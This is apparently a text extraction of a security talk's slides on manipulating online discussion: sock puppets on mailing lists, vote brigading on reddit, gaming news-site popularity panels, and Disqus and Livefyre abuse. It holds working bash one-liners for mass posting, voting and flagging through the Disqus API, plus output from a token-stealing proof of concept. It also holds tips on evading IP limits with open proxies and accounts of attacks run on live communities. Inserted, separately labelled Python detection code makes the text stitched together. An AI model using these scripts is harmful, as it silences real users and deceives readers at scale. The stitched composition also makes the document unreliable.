Egypt Cuts Off Most Internet a…

By MATT RICHTEL
Published: January 28, 2011

Autocratic governments often limit phone and Int…
tense times. But the Internet has never faced anyt…
happened in Egypt on Friday, when the governme…
80 million people and a modernizing economy cut…
access to the network and shut down cellphone se…






Libya cuts off Internet service: network monitor

LOS ANGELES, Sat Feb 19, 2011 10:24pm EST

(Reuters) - Internet service has been cut off in Libya for a second
consecutive day as protesters step up demonstrations against
longtime leader Muammar Gaddafi, a U.S. company that
monitors Internet traffic said on Saturday.
www.theregister.co.uk/2011/01/25/tunisia_facebook_password_slurping/

Tunisia plants country-wide keystroke logger on Facebook

Gmail and Yahoo! too

By Dan Goodin, 25 Jan 2011

Malicious code injected into Tunisian versions of Facebook, Gmail, and Yahoo! stole 
login credentials of users critical of the North African nation's authoritarian 
government, according to security experts and news reports. 

The rogue JavaScript, which was individually customized to steal passwords for each 
site, worked when users tried to login without availing themselves of the secure 
sockets layer protection designed to prevent man-in-the-middle attacks. It was found 
injected into Tunisian versions of Facebook, Gmail, and Yahoo! in late December, 
around the same time that protestors began demanding the ouster of Zine el-Abidine 
Ben Ali, the president who ruled the country from 1987 until his ouster 10 days ago.



Danny O'Brien, internet advocacy 
coordinator for the Committee to 
www.homelandsecuritynewswire.com/london-police-use-sma…

Homeland Security News Wire

Law enforcement technology

London police use smartphones, social
network to identify rioters

Published 10 August 2011

The rioters in London — and now, in other British cities — have
been using Blackberries to outmaneuver the police;
communicating via BlackBerry instant-message technology, as
well as by social networking sites like Facebook and Twitter, the
rioters repeatedly signaled fresh target areas to those caught up
in the mayhem; RIM has now agreed to cooperate with Scotland
Yard to turn over protestors using the service to coordinate their
assaults; the police is also releasing CCTV images of the rioters to
a group using face recognition technology to identify and
condemn rioters; the police is also using Flickr, Tumblr, and
Twitter to spot and identify participants in the riots

Smartphones, especially
Blackberries, have been a
helpful information
transmission and
coordination tool for
anti-government activists
in a score of Arab
countries - and they
Overt censorship is routed around

UGC - User Generated Content

UGC is a new(ish) paradigm

Nothing truly new under the sun

rent-a-crowds

How will Censorship handle UGC?

thinkst applied research

"So it's not only certain people have
a license to speak, now everyone
has a license to speak. It's a
question of who gets heard."

Censorship

Censorship 2.0

This is Profoundly Important

rent-a-crowds

sock puppet



noun 

a false online identity, typically created by a person or group in order 
to promote their own opinions or views: both sides in the debate use sock 
puppets to make it seem as if scores of people are arguing a point 

DERIVATIVES 

sock puppetry noun 



Oxford Dictionary of English 



If we were evil-corp
(or evil.gov)



what can be done ? 



what will be done ? 



what is being done ? 
Challenge:
How to measure efficacy




mail lists 

online polls 

twitter 

reddit 

news sites 

comment systems 



Why mailing lists? 



"Interesting" people still use it 
Personal curiosity 
what we wanted to do

Assume:

An email is going to a mail list
Can we make more people read it ?

Assume:

An email is going to a mail list
Can we make less people read it ?

How do we measure if more
(or less) people read our mail?

Link Clicks

How do we write mail content
worth clicking on ?

Plagiarize, Pilfer, Plunder & Pitch

but don't be too exciting

Control email

1. Send email with link

2. Wait 48 hours

3. Count clicks

Experimental email

1. Send email with link

2. Puppets send several
replies to make a
longer discussion
thread

3. Wait 48 hours

4. Count clicks

■ [liberationtech] Recent iOS privacy checks Keira Cran
■ [liberationtech] Recent iOS privacy checks Todd Weiler
■ [liberationtech] Recent iOS privacy checks duncan at openmailbox.org
■ [liberationtech] Recent iOS privacy checks Keira Cran

Control email

1. Send email with link

2. Wait 48 hours

3. Count clicks

Experimental email

1. Send email with link

2. Sock puppets send several
separate emails starting new
threads

3. Wait 48 hours

4. Count clicks
• [liberationtech] RIPE NCC Internet-wide measurement project duncan at openmailbox.org
• [liberationtech] Mapping out physical surveillance across a city Cody Tarrant
  ■ [liberationtech] Mapping out physical surveillance across a city Tim Schwartz
  ■ [liberationtech] Mapping out physical surveillance across a city Patrick
  ■ [liberationtech] Mapping out physical surveillance across a city coderman
  ■ [liberationtech] Mapping out physical surveillance across a city Blibbet
  ■ [liberationtech] Mapping out physical surveillance across a city Dan O'Huininn
• [liberationtech] […] access journal from Usenix Ryan Bartos
• [liberationtech] [SPAM:###] FSF email self defence project Greg White
• [liberationtech] The Hacking Team Commercial and are there others? Karen Dunnes
• [liberationtech] Viber features being blocked by the Gambian govt? Mary Bukowski
  ○ Re: So You Like Pain and Vulnerability Management? New Article. Pedro Ribeiro (May 13)
    ■ Re: So You Like Pain and Vulnerability Management? New Article. Daniel Wood (May 14)
[CVE-2014-1603] XSS in GetSimple CMS 3.3.1 Pedro Ribeiro (May 13)
CodeIgniter <= 2.1.4 and Kohana <= 3.2.3, 3.3.2 - Timing Attacks and Object injection Scott Arciszewski (May 13)
CVE-2014-2046 - Unauthenticated Credential And Configuration Retrieval In Broadcom Ltd PIPA C211 Portcullis
Cobbler Arbitrary File Read CVE-2014-3225 Dolev Farhi (May 14)
FD - Multiple stored XSS in FOG imaging deployment system CVE-2014-3111 Dolev Farhi (May 14)
Paypal Inc Bug Bounty #109 MOS - Bypass & Persistent Vulnerability Vulnerability Lab (May 14)
einstruction Workspace sudo vulnerability Martin von Gagem (May 14)
[CVE-2014-3719] ALEPH500 (Integrated library management system) SQL injection shadyMu (May 15)
AirDroid Lock Screen Bypass Michael Wisniewski (May 15)
  ○ Re: AirDroid Lock Screen Bypass Keith 1 Myers (May 15)
[CVE-2014-3718] ALEPH500 (Integrated library management system) Cross Site Scripting Vulnerability xxx (May
Mac OS X stack_chk_guard not always safe from overwrite rai (May 15)
[CVE-2014-3749] Construtiva CIS Manager CMS POST SQLi Edge (May 16)
check_dhcp - Nagios Plugins <= 2.0.1 Arbitrary Option File Read Dawid Golunski (May 16)
UPS Web/SNMP-Manager CS121 authentication bypass, credentials leak, ... jkmac (May 16)
CA20140413-01: Security Notice for OpenSSL Heartbleed Vul… Williams, James K (May 16)
HP Release Control Authenticated Privilege Escalation and XXE Brandon Perry (May 16)
Information Exposure via SNMP on ARRIS / Motorola […] Cable Modem Gateway Inokii Security Advisory
Re: [CVE-2014-3719] ALEPH500 (Integrated library management system) SQL Injection shadyMu (May 19)
JavaMail SMTP Header Injection via method setSubject [CSNC-2014-001] Alexandre Herzog (May 19)
VulDB: Apple Mac OS X up to 13.1.0 Stack Guard stack_chk_guard buffer overflow

General

scipID: 13247
Affected: Apple Mac OS X up to 13.1.0
Published: 05/15/2014 (rai)
Risk: problematic
Created: 05/18/2014
Entry: 74.7% complete

Summary

A vulnerability was found in Apple Mac OS X up to 13.1.0. It has been rated as problematic. This issue affects the
function stack_chk_guard of the component Stack Guard. The manipulation with an unknown input leads to a
buffer overflow vulnerability. Impacted is confidentiality, integrity, and availability.

The weakness was disclosed 05/15/2014 by rai as Mac OS X stack_chk_guard not always safe from overwrite as
mailinglist post (Full-Disclosure). The advisory is shared for download at seclists.org. The vendor was not
involved in the public release. The advisory contains:

All credit due to the anon pastebin poster.

The exploitation is known to be difficult. Attacking locally is a requirement. A single a…
exploitation. Technical details as well as a public exploit are known.

A public exploit has been developed by rai in ANSI C and been published immediat…
declared as proof-of-concept. The exploit is shared for download at maker.fea.st. T…
is:

#include

extern long stack_chk_guard;




on the internet, no one knows you're a cat. 



Improved Distract Att From X 



combine both approaches 

when an email on X appears, start several distraction
threads

attract attention to the distractor threads by lengthening
the threads with sock puppet mails

prepare juicy distractor threads ahead of time

Uses for evil.{corp,gov}

• start distractor threads around emails from opponents or
others you wish not to get as much attention

• add light discussion to attract attention to your emails

• discredit opponents by doing a bad sock puppetry
operation on their behalf



mail lists 

online polls 

twitter 

reddit 

news sites 

comment systems 








Why Polls ? 

• Used by a few major news sites 

• Huffington Post, Al Jazeera, etc. 

• Many more random bloggers 

• Even a Golden Globe movie awards poll 

• Readers see the results of polls 
The World's Most Influential Person Is...

By TIME Staff Monday, Apr. 27, 2009

In a stunning result, the winner of the third annual
TIME 100 poll and new owner of the title World's
Most Influential Person is moot. The 21-year-old
college student and founder of the online community
4chan.org, whose real name is Christopher Poole,
received 16,794,368 votes and an average influence
rating of 90 (out of a possible 100) to handily beat
the likes of Barack Obama, Vladimir Putin and
Oprah Winfrey. To put the magnitude of the upset in
perspective, it's worth noting that everyone moot
beat out actually has a job.

Surely this is a solved problem
HuffPo Readers Poll

[Chart: THE HUFFPOST/YOUGOV POLL. "How closely are you following news about the group known as the Islamic State, ISIS or ISIL that has been operating in Syria and Iraq?" Series: YouGov All Americans, HuffPost Readers. Answers: Very closely, Somewhat closely, Not very closely, Not closely at all.]

Subtle Win

[Chart: same poll. Visible values: 77%, 41%, 19%.]

Landslide Win

[Chart: same poll. Visible values: 41%, 13%.]

these polls have a serious
credibility problem

in 140 seconds..

TL;DR

Gilad Lotan bought followers and did some
cool analysis of the network graph*

*https://medium.com/i-data/fake-friends-with-real-benefits-eec8c4693bd3
Those communications were:

• too trivial for movies

• too voluminous for mail

• too scandalous for news

Only feasible w/ decentralization.

New transactions of many kinds to appear.
Will there be Bitcoin analogs for the:

- upvote
- like
- tweet
- blogpost
- email
- chat room
- IM

Internet permitted new comm types: trivial, voluminous, scandalous.
What new txs does Bitcoin permit?
Put arms on a bird they said... (i.imgur.com)
submitted 4 days ago by ivolunteerastribble
6 comments

X-post from /r/gaming. Hotline Miami badass chick arms! (i.imgur.com)
submitted 3 days ago by Larlockl
1 comment

"I have eyes on the target, over." (i.imgur.com)
submitted 5 days ago by SomeNorwegianChick
15 comments

I am the Kingslayer (i.imgur.com)
163
submitted 5 days ago by SomeNorwegianChick
2 comments

Ninja Bird (imgur.com)
submitted 6 days ago by TheHappySlothonaut
4 comments

Bird Arm Billboard. This anyone's work? (imgur.com)
submitted 7 days ago by JackFlagon
5 comments
Check this very active LIVE feed for the latest on Occupy Central in Hong Kong.

Greece Is In Full Blown Stock Market Collapse (businessinsider.com)
1 2156 submitted 4 hours ago by yam 12
619 comments

'Anonymous' Hacker Group Goes After ISIS (anonhq.com)
2 1550 submitted 3 hours ago by Nedrin
336 comments

Hong Kong Police filmed beating protester (online.wsj.com)
3 3709 submitted 11 hours ago by L33tmaster
601 comments

Saddam-Era Chemical Weapons Now Under ISIS Control (ibtimes.com)
4 2382 submitted 8 hours ago by fligs
1175 comments

Iconic 2,500 year old Siberian princess 'died from breast cancer',
reveals MRI scan. Preserved by ice, the 25 year old ancient woman
covered in tattoos used cannabis to cope with her ravaging illness.
(siberiantimes.com)
677 submitted 2 hours ago by Acantiias
65 comments

theguardian Activists use GPS to track illegal loggers in Brazil's
Amazon rainforest: Hi-tech undercover operation used GPS tracking
on timber trucks for the first time, as well as satellite and aerial
images to reveal extent of illegal logging in Brazilian Amazon.
(theguardian.com)
Filter Iraq / ISIS

Filter Ukraine / Russia

Filter Israel / Palestine

Filter Ebola

Filter all dominant topics

[Chart: Reddit post hotness by score and age. Author: Randy Olson (www.randalolson.com / @randal_olson)]

Upvote articles we want to promote
Downvote articles we want to kill

So first we needed accounts..

Our accounts seemed broken

reddit's secret sauce

But we have > 50 accounts

What can we do with 50
accounts?

On small subreddits it's easy to
get a new article on to front page
by up voting
[Featured Post] /r/netsec's Q2 2014 Information Security Hiring Thread

How to Safely Generate a Random Number (like 6ae51281cde590)
26 submitted 4 minutes ago by Wastol

An overview of how reddit's new CSS filter works. (self.netsec)

Revocation still doesn't work



On large subreddits like 
worldnews, 50 isn't enough for 

a full win 
Upvote articles we want to promote
Downvote articles we want to kill

Let's also try down voting..

downvote stuff to knock into moderation queue

below user/subreddit preference

Trickle Downvoting: only down
vote as many up votes as new
articles have

Up-vote our target
Trickle down-vote others

Mass-DownVoting

What would happen if we down
voted all new articles as they
appeared?



Began with worldnews 



WORLDNEWS

In eastern Ukraine, the mob rules

all 15 comments

If you look at r/worldnews/new, all posts that mention "russia" in title are massively …
downvote coun…

edit: they now switched it so it downvotes all submissions....

How the heck is this at 56 downvotes after 4 minutes?!



Then.. 
WE'RE UNDER ATTACK, COMRADES! STAY CALM AND DON'T MOVE - WE'RE FIGHTING THIS
THING WITH EVERYTHING WE'VE GOT! (reddit.com)

submitted 5 months ago by janre byron dean to /r/circlebroke2

This duck sucks.

Amazing what mods can do for a 10 year old game (HL2)

Early Movie Concept Arts

This year's birthday treasure hunt for my son.

John Oliver reads an unexpected and hilarious response from POM Wonderful after skewering them on his show

While I was drinking coffee this morning, my dog brought me this. I have no idea where it came from.

/r/worldnews is currently under a downvote attack - here's what you need to know, and what you can do

2062

submitted 4 hours ago by slapchopsuey to /r/worldnews
794 comments

/r/worldnews is currently under a downvote attack - here's what you need to know, and what you can do

1576 submitted 13 hours ago by slapchopsuey

You've probably noticed that the up/down vote numbers have suddenly turned very strange in the past few hours, 
with everything being downvoted below zero. This is because /r/worldnews is under attack. The source of the 
downvoting is currently unknown but we and the admins are investigating and doing our best to find out. 

The purpose of this attack is to disrupt the subreddit. It does this by delivering enough downvotes to render posts 
invisible by reddit's default settings, and to discourage your participating by downvoting everything below zero. 

Here's what you need to know: 

• Don't worry about the downvotes affecting your karma. The unusual votes (in this case, downvotes) will be
wiped out when the source of the problem is identified. This will probably take a few days.

• One of the goals of the attack is to render posts invisible by downvoting them below the default threshold
in users' preferences settings. The way you can neutralize that part of the attack is by changing the
threshold of invisibility in your user preferences. Here's how: 1. In the upper right of your screen in the
area with your username, click preferences. 2. In preferences, go to the "link options" section, and change
the final line, where it says "don't show me sites with a score of less than ". You can set it to any
negative number (ex. -100), but even better than filling in a negative number is just leaving the box blank.
By leaving the box blank you will completely neutralize the attackers' ability to make posts invisible.

• The "hot" tab will be broken for the duration of the attack, but we recommend browsing by the "new" tab 
(/r/worldnews/new). 

• We also recommend voting; obviously we can't tell you how to vote, but human votes help minimize the 
impact of the attackers, and it only takes a fraction of a second to click the arrows. 

If you like reading and participating in /r/worldnews, following the above tips can help restore most of the 
everyday /r/worldnews experience for you, and with your participating in voting, you can help to weaken and 
expose the attackers, so the admins can solve the problem faster. 

We apologize for the disruption, we appreciate your patience, and we welcome any tips you have for how we can 
improve the /r/worldnews user experience in this time of difficulty.

1589 comments



Much speculation ensued .. 
For the record, we had nothing to do with /r/technology

Simultaneously, we ran the
same thing on netsec...

But netsec moderators responded
with intelligent discussion and
roped in official reddit admins to
talk about the problem..

You had a group of about 20 bots that were being used to downvote posts in the subreddit. We rendered the voting from
those accounts ineffective, but to make it more difficult for the controller of the bots to realize that they've been disabled,
we still need to make it look like their votes are applying. If we just throw away their votes entirely, the controller's going
to see that their bots have been blocked, and change up what they're doing immediately.

that looks like the votes are still applying (even though, as you said, we don't actually rank using it internally). The fake
score can't be only shown to bot accounts. If the controller opens a submission in an incognito window via TOR or
something, we'd have no way of linking them back to the bots. So when their 20 downvotes are gone there, they'd know
what happened. This is /r I'm sure I don't need to elaborate on how many other options there are for separating
yourself from this sort of thing. The only feasible option is showing the fake scores to everyone unless we want detection
to be trivial.

Being able to hide scores on submissions temporarily like you suggested might help some, but it really just delays the
problem, it doesn't solve it. There are also various undesirable side effects from hiding submission scores that don't apply
as much to comments. Over the years, a number of subreddits have tried experiments with hiding all submission scores
using CSS like you've done, and they pretty much universally decided that it was a bad idea. Because the "hot" ranking
involves both score and time, with things dropping in rank based on how old they are, being able to see the scores lets the
viewer easily get an idea of how popular/significant different submissions are. Without that information available, it
becomes extremely difficult for someone to look at a subreddit's front page and quickly figure out which submissions were
the most popular recently.

I was the one that added the ability for moderators to temporarily hide comment scores, and I've definitely thought about
extending it to submissions as well. But seeing how poorly all of those experiments that tried to do the same thing with
CSS ended up going has made me hesitant about it. We do already have a very "light" score-hiding for submissions, where
you can't see the score for the first 2 hours unless you actually visit the comments page. I'm not fully convinced that
allowing true hiding like we have for comments would be a good thing, and most likely especially not for longer time
periods since it makes the front page more and more confusing the longer the scores are hidden for.



This should have been much
easier to spot

SA-CORE-2014-005 - Drupal core - SQL injection (drupal.org)

submitted 12 hours ago by darknessproz
7 comments
signup times

some common email domains
pattern of names

ip-addresses from known open proxies
user-agents: headers
low karma interactors
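
The signals listed above, combined into one scoring pass over the accounts that voted on a single submission. This is an added example, not code from the talk or from reddit; the `Voter` fields, the thresholds and all sample records are constructed assumptions.

```python
import re
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Voter:
    """One account that voted on the submission under review (hypothetical schema)."""
    name: str
    signup: datetime
    email_domain: str
    ip: str
    user_agent: str
    karma: int


def name_shape(name):
    """Reduce a username to its pattern: letter runs -> 'a', digit runs -> '9'."""
    return re.sub(r"\d+", "9", re.sub(r"[A-Za-z]+", "a", name))


def signup_burst(voters, window=timedelta(hours=1), min_size=5):
    """Names of accounts created inside any sliding window holding >= min_size signups."""
    ordered = sorted(voters, key=lambda v: v.signup)
    flagged, lo = set(), 0
    for hi, v in enumerate(ordered):
        while v.signup - ordered[lo].signup > window:
            lo += 1
        if hi - lo + 1 >= min_size:
            flagged.update(x.name for x in ordered[lo:hi + 1])
    return flagged


def over_represented(voters, key, share=0.3):
    """Attribute values carried by at least `share` of this submission's voters.
    A real deployment would compare against the site-wide baseline instead."""
    counts = Counter(key(v) for v in voters)
    return {k for k, c in counts.items() if c / len(voters) >= share}


def score_voters(voters, open_proxies, low_karma=5):
    """Map each account name to the list of signals it trips, in a fixed order."""
    burst = signup_burst(voters)
    domains = over_represented(voters, lambda v: v.email_domain)
    shapes = over_represented(voters, lambda v: name_shape(v.name))
    agents = over_represented(voters, lambda v: v.user_agent)
    report = {}
    for v in voters:
        checks = [
            ("signup_burst", v.name in burst),
            ("email_domain", v.email_domain in domains),
            ("name_pattern", name_shape(v.name) in shapes),
            ("open_proxy", v.ip in open_proxies),
            ("user_agent", v.user_agent in agents),
            ("low_karma", v.karma < low_karma),
        ]
        report[v.name] = [label for label, hit in checks if hit]
    return report


def flag_coordinated(voters, open_proxies, min_signals=3):
    """Accounts tripping several independent signals; one signal alone is not enough."""
    report = score_voters(voters, open_proxies)
    return sorted(n for n, hits in report.items() if len(hits) >= min_signals)


# Constructed sample: six scripted accounts and six organic ones (documentation IP ranges).
_T0 = datetime(2014, 5, 1, 12, 0)
SAMPLE_PROXIES = {"203.0.113.7", "203.0.113.9"}
SAMPLE_VOTERS = [
    Voter(f"mkr_{1001 + i}", _T0 + timedelta(minutes=i), "mailbox.example",
          sorted(SAMPLE_PROXIES)[i % 2], "python-requests/2.3.0", 1)
    for i in range(6)
] + [
    Voter("slow_reader", datetime(2010, 3, 1), "uni.example", "198.51.100.4",
          "Mozilla/5.0 (X11; Linux) Firefox/29.0", 4210),
    Voter("Kestrel42", datetime(2011, 7, 15), "corp.example", "198.51.100.18",
          "Mozilla/5.0 (Macintosh) Safari/537.75", 860),
    Voter("ph0bos", datetime(2012, 1, 9), "isp.example", "198.51.100.33",
          "Mozilla/5.0 (Windows NT 6.1) Chrome/34.0", 129),
    Voter("tea-and-packets", datetime(2013, 11, 2), "lab.example", "198.51.100.47",
          "Mozilla/5.0 (Windows NT 6.3) Firefox/28.0", 77),
    Voter("quietlurker", datetime(2014, 2, 20), "home.example", "198.51.100.52",
          "Mozilla/5.0 (iPad) Safari/9537.53", 12),
    Voter("nm_1987", datetime(2014, 4, 30), "post.example", "198.51.100.60",
          "Mozilla/5.0 (Android 4.4) Chrome/34.0", 2),
]

if __name__ == "__main__":
    for name, hits in score_voters(SAMPLE_VOTERS, SAMPLE_PROXIES).items():
        print(f"{name:16} {len(hits)} {hits}")
```

The organic account `nm_1987` shares the scripted accounts' name pattern and is new, yet stays below the threshold because it trips only two signals.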



this post was submitted on 05 May 2014
0 points (46% like it)

54 upvotes, […] downvotes

shortlink: http://redd.it/24rhai

this post was submitted on 05 May 2014

337 points (83% upvoted)



Growing Personas for Karma 
Everything i needed to know about managing hackers, i learnt from my DVD collection..
Does twitter kill the blogging star ? 

Memory Corruption Attacks. The (almost) complete history.. 

Some Computer Security Prezi's 

Anonymity loves Company 

Tell HN: Toy app thrown together for fun 

Too many InfoSec Conferences? (Infographic Inside) 

Tell HN: Subscription Service that covers InfoSec Happenings.. 

What Anonymous taught us about Cyber War 

Searchable Security Conference Site 

LulzSec will be used to Usher in Regulation (few of us will like) 

Create graphs/nodes/edges in JavaScript (an arborjs tutorial) 

Automated Shoulder Surfing Attacks (Computer Vision meets on screen keyboards) 

BlackHat 2011 (according to Twitter) 

(Simple) Chrome plugin for GPG/PGP in GMail

Update: (Simple)Chrome plugin to enable GPG in Gmail 

Oracles Mary Ann Davidson lashes out at Security Firm 

Poll: Spotted the Polls/Karma Link? 

Etsy's Office-Hacker Job shows established companies the way.. 



You and Your Research, a modern take 
Why News Sites?

Cyclone Hudhud leaves trail of
devastation; 6 killed in Andhra
Pradesh, Odisha

Cyclone Hudhud pounded the coastal
districts of Andhra Pradesh and Odisha
with heavy rain and winds of almost
195 kmph leaving six people dead and
a trail of devastation with
Visakhapatnam, where the very severe
storm made landfall, bearing the brunt. NDRF
helplines: 01126107953; 09711077372

Pakistan targets 15 posts in Jammu,
seeks UN intervention

Pakistan heavily shelled 15 border
outposts and hamlets in Arnia sector of
Jammu and Kashmir early Sunday
even as it wrote to UN chief Ban Ki-moon
blaming India for the escalation
in border clashes and sought UN
intervention on Kashmir.

Rahul Gandhi to do a BJP, veterans
will make way for Gen Next

In what may set off alarm bells for
many powerful Congress veterans,
Rahul Gandhi is learnt to be planning
to introduce some drastic measures,
including bringing up a new set of

In pics: Hudhud takes India by storm

Cyclone Hudhud hit India's east coast with
monstrous ferocity on Sunday, killing at least six
people and leaving behind a trail of destruction
in Andhra Pradesh and neighbouring Odisha.

most viewed

stories | photos | videos

• India hits back with vengeance, strikes 37 Pak
posts, 15 killed

• Pakistan taught 'befitting lesson', says Modi after
decline in firing

• Hudhud intensifies; Odisha, Andhra brace for
impact

• Vishal Bharadwaj's Haider isn't just 'cry freedom'.
It's Gandhian plea for peace

• Kailash Satyarthi's crusade to save childhood
continues; 60 mn still need him

cricket | football | tennis

Mohammed Shami a vital cog in MS
Dhoni's plans



Can we influence this panel? 
Get articles on it or keep articles 

off it? 
[Screenshots: news site front page with a "Most Popular This Week" panel ("Most commented" / "Most read")]
[Screenshot: online.wsj.com home page]

Content engaging our readers now, with additional prominence accorded if the
story is rapidly gaining attention. Our WSJ algorithm comprises 30% page views,
20% Facebook, 20% Twitter, 20% email shares and 10% comments.



[Screenshot: tweets from @LailaBlunt linking to online.wsj.com articles]
[Screenshots: online.wsj.com and other news site front pages, ending with a "Most Emailed" / "Most Viewed" top-10 list]
but we need an account on the site to share the article

thinkst applied research

At the time of writing, we have at least 30 000 accounts

** NYT Admins - Sorry!
[Screenshots: the "Most Emailed" list, items 13 to 20]
Cost to register 30k accounts: $0.12

Cost to share 30k stories: $0.18

Trivially manipulate the NYT front page: Priceless
• Disqus lets you drop a few lines of .js in your page,
which magically gives you an entire commenting
system.

• Comments can be voted up/down, which affects order.

• User profiles are visible across sites and your
comments are gathered in your Disqus profile page.

• Admins get a nifty interface to moderate and maintain
their comment threads.

Used by Wordpress blogs,
Tumblrs, soccer mom forums
and CNN, Al Jazeera, Bloomberg,
The Next Web, NPR, The Atlantic,
IGN, The Daily Telegraph etc

They don't control the full message
• Login: left as an exercise for the reader

• Mass post:

export thread="threadid";export msg="mymessage"; (for i in `seq -f "userprefix%g" 1 100`;do echo "curl -b \"${i}.cookies\" -d \"thread=${thread}&message=${msg}&api_key=${API_KEY}\" http://disqus.com/api/3.0/posts/create.json";done;)|parallel

• Mass vote:

export post="postid";export vote="1"; (for i in `seq -f "userprefix%g" 1 100`;do echo "curl -b \"${i}.cookies\" -d \"post=${post}&vote=${vote}&api_key=${API_KEY}\" http://disqus.com/api/3.0/posts/vote.json";done;)|parallel

• Mass downvote:

export post="postid";export vote="-1"; (for i in `seq -f "userprefix%g" 1 100`;do echo "curl -b \"${i}.cookies\" -d \"post=${post}&vote=${vote}&api_key=${API_KEY}\" http://disqus.com/api/3.0/posts/vote.json";done;)|parallel

• Bonus: Flag posts to temporarily make them disappear

export post="postid"; (for i in `seq -f "userprefix%g" 1 100`;do echo "curl -b \"${i}.cookies\" -d \"post=${post}&api_key=${API_KEY}\" http://disqus.com/api/3.0/posts/report.json";done;)|parallel
Pretty much complete control of Disqus forums
(with 1 line of bash script)

Wut?

User registration isn't IP-limited, as far as we've encountered

Email verification isn't a requirement

Guest voting _is_ IP-limited

Open proxy lists bypass this trivially

ALL OF THE SAME ATTACKS
[Screenshot: comment thread under www.foxnews.com/us/2014/10/15/losing-war-on-coal-one-virginia-town-painful-decline/, with a comment posted "just now" by "PSObama"]
Flag as spam 4/5 times to remove
(try it yourself on fox news :)

Livefyre: one more thing..
[Screenshots: Livefyre comment widget on a tennis.com article, and a two-comment test thread viewed as "normaluser4"]
(venv)user@ubuntu:~/livefyre$ python poc-tokensteal.py
Running on http://127.0.0.1:5000/
Restarting with reloader
127.0.0.1 - - [07/Oct/2014 01:18:36] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [07/Oct/2014 01:18:42] "GET /script.js HTTP/1.1" 200 -
127.0.0.1 - - [07/Oct/2014 01:18:42] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [07/Oct/2014 01:18:42] "GET /favicon.ico HTTP/1.1" 404 -
Got token (eyJhb..)
Posted comment (ok)
127.0.0.1 - - [07/Oct/2014 01:19:03] "GET /lftoken/eyJhb..



[Screenshot: Livefyre comment box on www.newrepublic.com (6 comments, 12 people listening), posting as "normaluser4"]



"We are told about the world before we see it. We imagine most things before we 
experience them. And those preconceptions, unless education has made us acutely aware, 
govern deeply the whole process of perception." Walter Lippmann, Public Opinion 
4chan polls

http://venturebeat.com/2012/06/22/reddit-fake-users/

[Screenshots: comments posted by the Disqus user "HamBaconEggs" on "Palestine in Chile", alongside a forum member profile]

http://www.commondreams.org/hambaconeggs-screen-names.
Remember:

We discovered that flagging
posts got them killed?

[Screenshot: Facebook posts from a page named "IDF": "Please help us by marking any antisemitic and anti Israeli comments as spam!" (434 Likes, 86 Comments) and "Will you help?"]

JTRIG

http://en.wikipedia.org/wiki/Joint_Threat_Research_Intelligence_Grou
Two broad categories



nee or disruption* 



on 



Known in GCHQ as nUne overt 
[Screenshot: JTRIG tools document as published by The Intercept]

SWAMP DONKEY is a tool that will silently locate all predefined types of file and encrypt them on a target's machine. Ready to fire (but see target restrictions)

TORNADO ALLEY is a delivery method (Excel Spreadsheet) that can silently extract and run an executable on a target's machine. Ready to fire (but see target restrictions)

UNDERPASS: Change outcome of online polls (previously known as NUBILO). In development.

VIPERS TONGUE is a tool that will silently Denial of Service calls on a Satellite Phone or a GSM Phone. Ready to fire (but see target restrictions)

WARPATH: Mass delivery of SMS messages to support an Information Operations campaign. Ready to fire

UNDERPASS Change outcome of online polls (previously known as NUBILO)

In development



Disqus seems ripe for the picking.
So we went looking for active armies.
Most commented thread on
CNN's highest voted comment

[Screenshot: CNN Disqus thread with 46324 comments, sorted by Best; the top comment has 665 votes]

Approach

Pick slightly controversial topic:

Pick news orgs that cover this topic

Then

• Use Disqus API to get a list of popular stories

• For each story, use the API to pull user info

• Link users to stories they commented on

• and...

SETEC REAL WOOF CRETS

Cue a bunch of similar
attempts to look at the data

Decided to focus on voting

Pull all comments for random story.
For each comment pull the non-guest voters.
For each voter retrieve their registration time.



Calculate the variation in voter age on each comment 
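
The voter-age check described above, written out as an added example (it is not the researchers' tooling). It computes the spread of voter account ages per comment and, as an addition beyond the slide, the share of voters registered inside a single hour, which still fires when one older account votes alongside a freshly registered batch. The data, field layout and thresholds are constructed assumptions.

```python
from datetime import datetime, timedelta
from statistics import median, pstdev

# Constructed sample: comment id -> registration timestamps of that comment's
# non-guest voters (guest votes have no account to inspect).
SAMPLE_VOTERS = {
    "c1": ["2009-03-14T08:02:11", "2011-11-02T19:40:00",
           "2013-06-21T12:15:45", "2014-01-30T06:05:09"],
    "c2": ["2010-07-04T10:00:00", "2012-02-29T23:59:59", "2012-12-12T12:12:12"],
    # Every voter registered within one minute of the others.
    "c3": ["2014-05-01T09:00:03", "2014-05-01T09:00:08", "2014-05-01T09:00:27",
           "2014-05-01T09:00:37", "2014-05-01T09:01:02"],
    # The same kind of batch plus one unrelated older account, which inflates
    # the standard deviation and hides the batch from a variance-only check.
    "c4": ["2014-05-01T09:03:10", "2014-05-01T09:03:43", "2014-05-01T09:03:49",
           "2014-05-01T09:03:58", "2010-08-11T00:45:34"],
    "c5": ["2013-01-01T00:00:00"],  # too few voters to judge
}
NOW = datetime(2014, 10, 1)  # reference time for "account age" (constructed)


def age_spread_days(timestamps, now):
    """Population standard deviation of voter account age, in days."""
    ages = [(now - datetime.fromisoformat(t)).total_seconds() / 86400
            for t in timestamps]
    return pstdev(ages)


def burst_share(timestamps, window=timedelta(hours=1)):
    """Largest fraction of voters whose registrations fit in one window."""
    times = sorted(datetime.fromisoformat(t) for t in timestamps)
    best, lo = 0, 0
    for hi in range(len(times)):
        while times[hi] - times[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best / len(times)


def score_comments(voters_by_comment, now, min_voters=3, ratio=0.1, share=0.6):
    """Flag comments whose voters look like one registration batch.

    low-age-variation:  spread below `ratio` times the story's median spread
    registration-burst: at least `share` of voters registered within an hour
    Comments with fewer than `min_voters` known voters are skipped.
    """
    spreads = {cid: age_spread_days(ts, now)
               for cid, ts in voters_by_comment.items() if len(ts) >= min_voters}
    if not spreads:
        return {}
    baseline = median(spreads.values())
    report = {}
    for cid, spread in spreads.items():
        reasons = []
        if spread < ratio * baseline:
            reasons.append("low-age-variation")
        if burst_share(voters_by_comment[cid]) >= share:
            reasons.append("registration-burst")
        report[cid] = {"spread_days": round(spread, 2), "reasons": reasons}
    return report


if __name__ == "__main__":
    for cid, row in sorted(score_comments(SAMPLE_VOTERS, NOW).items()):
        print(cid, row)
```
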



[Plot: Voter Age Variation (y axis, up to 1800) for each Comment (x axis)]




What stood out 



